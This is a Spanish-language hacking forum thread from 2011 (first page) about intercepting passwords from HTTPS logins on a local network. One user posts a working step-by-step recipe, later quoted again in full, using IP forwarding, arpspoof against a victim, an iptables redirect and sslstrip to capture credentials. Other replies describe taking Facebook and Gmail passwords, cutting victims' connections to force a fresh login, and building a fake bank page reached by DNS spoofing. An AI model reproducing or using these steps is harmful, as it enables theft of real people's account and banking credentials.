elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Únete al Grupo Steam elhacker.NET


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking (Moderador: toxeek)
| | |-+  Ettercap - Contraseña SSL - Cual es mejor forma?
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] 2 Ir Abajo Respuesta Imprimir
Autor Tema: Ettercap - Contraseña SSL - Cual es mejor forma?  (Leído 19,838 veces)
SokarTefnut

Desconectado Desconectado

Mensajes: 124



Ver Perfil
Ettercap - Contraseña SSL - Cual es mejor forma?
« en: 6 Marzo 2011, 22:23 pm »

Hola a todos, llevo poco tiempo en el mundo del Hacking,y me doy cuenta de que cuanto mas estudio, mas parece quedarme por aprender.

Tras analizar con Wireshark el trafico generado por cierta pagina web de entrada de usuario y contraseña, observo que utiliza el protocolo SSL, haciendo ARP-Spoof con Ettercap,éste no parece ser capaz de descifrar éste protocolo,aunque he leido que Ettercap es capaz.

Mi pregunta es si alguien sabe el procedimiento,o que pluggin es necesario para conseguirlo.
Lo he intentado desde Windows, y desde Linux,con BackTrack, pero ni en modo consola lo he logrado.
Gracias por cualquier ayuda o sugerencia.
En línea

"Saber romper medidas de seguridad no hace que seas hacker, al igual que saber hacer un puente en un coche no te convierte en un ingeniero de automoción"
-- Eric Raymond -- http://en.wikipedia.org/wiki/Eric_S._Raymond
y0g-s0th0th

Desconectado Desconectado

Mensajes: 148



Ver Perfil
Re: Ettercap - Contraseña SSL - Cual es mejor forma?
« Respuesta #1 en: 7 Marzo 2011, 01:37 am »

con ettercap podes pero el certificado q genera, al ser falso, causa una alerta en el navegador del objetivo. lo mejor es usar sslstrip.


saludos
En línea

Para invocar a Yog-Sothoth habrás de esperar a que el sol penetre en la quinta mansión, con Saturno en trino; luego has de trazar el pentáculo de fuego, recitando el noveno verso tres veces; y, repitiéndolo todos los años cuando la Noche del árbol de Mayo y en la de Difuntos, harás que el Ser se engendre en los Espacios Exteriores, más allá de la puerta que custodia Yog-Sothoth.
SokarTefnut

Desconectado Desconectado

Mensajes: 124



Ver Perfil
Re: Ettercap - Contraseña SSL - Cual es mejor forma?
« Respuesta #2 en: 7 Marzo 2011, 11:06 am »

Gracias por la respuesta,creo que encontré la manera de romper SSL usando sslstrip:

1.- Habilitamos la capacidad para reenvío (routing) del kernel
echo 1 > /proc/sys/net/ipv4/ip_forward   

2.- Comenzamos el envenenamiento ARP
     (arpspoof -i {interfaz_red} -t {ip_victima} {ip_router})
arpspoof -i eth0 -t 192.168.1.100 192.168.1.1

3.- Cambiamos la redireccion de puertos usando las iptables,de esta
     manera,estaremos transparentes para la victima,que podrá logearse
     sin problemas:
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000

4.- Comenzamos con sslstrip (sslstrip.py -w {nombre_del_archivo_de_captura})
sslstrip -w  miarchivo  

5.- Abrir otra shell si queremos ver en tiempo real la informacion
tail -f miarchivo



« Última modificación: 8 Marzo 2011, 09:05 am por SokarTefnut » En línea

"Saber romper medidas de seguridad no hace que seas hacker, al igual que saber hacer un puente en un coche no te convierte en un ingeniero de automoción"
-- Eric Raymond -- http://en.wikipedia.org/wiki/Eric_S._Raymond
y0g-s0th0th

Desconectado Desconectado

Mensajes: 148



Ver Perfil
Re: Ettercap - Contraseña SSL - Cual es mejor forma?
« Respuesta #3 en: 7 Marzo 2011, 19:16 pm »

si, creo q esta todo. si tenes problemas avisa q tengo algun tuto armado x ahi.


saludos
En línea

Para invocar a Yog-Sothoth habrás de esperar a que el sol penetre en la quinta mansión, con Saturno en trino; luego has de trazar el pentáculo de fuego, recitando el noveno verso tres veces; y, repitiéndolo todos los años cuando la Noche del árbol de Mayo y en la de Difuntos, harás que el Ser se engendre en los Espacios Exteriores, más allá de la puerta que custodia Yog-Sothoth.
SokarTefnut

Desconectado Desconectado

Mensajes: 124



Ver Perfil
Re: Ettercap - Contraseña SSL - Cual es mejor forma?
« Respuesta #4 en: 8 Marzo 2011, 09:12 am »

No logro capturar nada, ni con el procedimiento explicado anteriormente, el archivo de captura se crea, pero siempre queda vacio, algo falla.

El ARP spoofing funciona correctamente, si miro la caché ARP de la víctima, me aparecen las MAC direccionadas hacia la maquina atacante, tanto ésta como el server.

¿ No es necesario direccionar el SSLSTRIP hacia la interfaz de red en uso ? (En mi caso eth0)
En línea

"Saber romper medidas de seguridad no hace que seas hacker, al igual que saber hacer un puente en un coche no te convierte en un ingeniero de automoción"
-- Eric Raymond -- http://en.wikipedia.org/wiki/Eric_S._Raymond
y0g-s0th0th

Desconectado Desconectado

Mensajes: 148



Ver Perfil
Re: Ettercap - Contraseña SSL - Cual es mejor forma?
« Respuesta #5 en: 9 Marzo 2011, 01:27 am »

no, asi deberia funcionar. seguro q haces bien el envenenamiento?

con ettercap q te pasaba? capturabas bien passes de texto plano? proba con ettercap sino en lugar de arpspoof a ver q pasa.


saludos
En línea

Para invocar a Yog-Sothoth habrás de esperar a que el sol penetre en la quinta mansión, con Saturno en trino; luego has de trazar el pentáculo de fuego, recitando el noveno verso tres veces; y, repitiéndolo todos los años cuando la Noche del árbol de Mayo y en la de Difuntos, harás que el Ser se engendre en los Espacios Exteriores, más allá de la puerta que custodia Yog-Sothoth.
valdomero

Desconectado Desconectado

Mensajes: 66


¡ Viva el pueblo llano !


Ver Perfil
Re: Ettercap - Contraseña SSL - Cual es mejor forma?
« Respuesta #6 en: 24 Marzo 2011, 18:56 pm »

Hola.
He probado el backtrack 4 y usado el sslstrip consiguiendo sacar mi clave . Lo que ocurre es que cuando entro en el correo de forma directa ( sin meter la contraseña ) solo consigo ver el correo pero no la clave. Hay alguna forma de interpretar los datos cifrados que me aparecen en el sslstrip.
Saludos
En línea

EvilGoblin


Desconectado Desconectado

Mensajes: 2.323


YO NO LA VOTE!


Ver Perfil
Re: Ettercap - Contraseña SSL - Cual es mejor forma?
« Respuesta #7 en: 29 Marzo 2011, 21:15 pm »

En el logeo automatico puede que se dirija directamente con https://

Lo que puedes hacer es matar ese proceso, (cortar la comunicacion)

para que tenga que volverse a conectar.

yo lo probe con facebook, gmail y otras cuentas y funciona lo mas bien.


con cuentas de banco (ejem: visa) no logre que funcione. directamente tiene que ser si o si https: certificado por ellos.

la unica forma es DNSarp. crear una pagina falsa y redirigir el trafico a tu pagina (si solicita visa en este caso)

asi si lo logre, pero no logre que se vea bien la pagina xD :P pero es safable.
En línea

Experimental Serial Lain [Linux User]
valdomero

Desconectado Desconectado

Mensajes: 66


¡ Viva el pueblo llano !


Ver Perfil
Re: Ettercap - Contraseña SSL - Cual es mejor forma?
« Respuesta #8 en: 30 Marzo 2011, 00:33 am »

gracias EvilGoblin
He usado este comando /etc/rc.d/init.d/network restart , pero no he conseguido nada, claro que puede ser porque unos de los pc tiene windows. Si es por eso cual seria el comando en linux para reiniciar la conexion en mi torre que tiene xp
Saludos
« Última modificación: 1 Abril 2011, 00:42 am por valdomero » En línea

xexudj89

Desconectado Desconectado

Mensajes: 41


Ver Perfil
Re: Ettercap - Contraseña SSL - Cual es mejor forma?
« Respuesta #9 en: 28 Abril 2011, 11:35 am »

Gracias por la respuesta,creo que encontré la manera de romper SSL usando sslstrip:

1.- Habilitamos la capacidad para reenvío (routing) del kernel
echo 1 > /proc/sys/net/ipv4/ip_forward   

2.- Comenzamos el envenenamiento ARP
     (arpspoof -i {interfaz_red} -t {ip_victima} {ip_router})
arpspoof -i eth0 -t 192.168.1.100 192.168.1.1

3.- Cambiamos la redireccion de puertos usando las iptables,de esta
     manera,estaremos transparentes para la victima,que podrá logearse
     sin problemas:
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000

4.- Comenzamos con sslstrip (sslstrip.py -w {nombre_del_archivo_de_captura})
sslstrip -w  miarchivo  

5.- Abrir otra shell si queremos ver en tiempo real la informacion
tail -f miarchivo





se podria hacer para que lo haga con toda la red a la vez o solo se puede con un pc a la vez??
En línea

Páginas: [1] 2 Ir Arriba Respuesta Imprimir 

Ir a:  
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines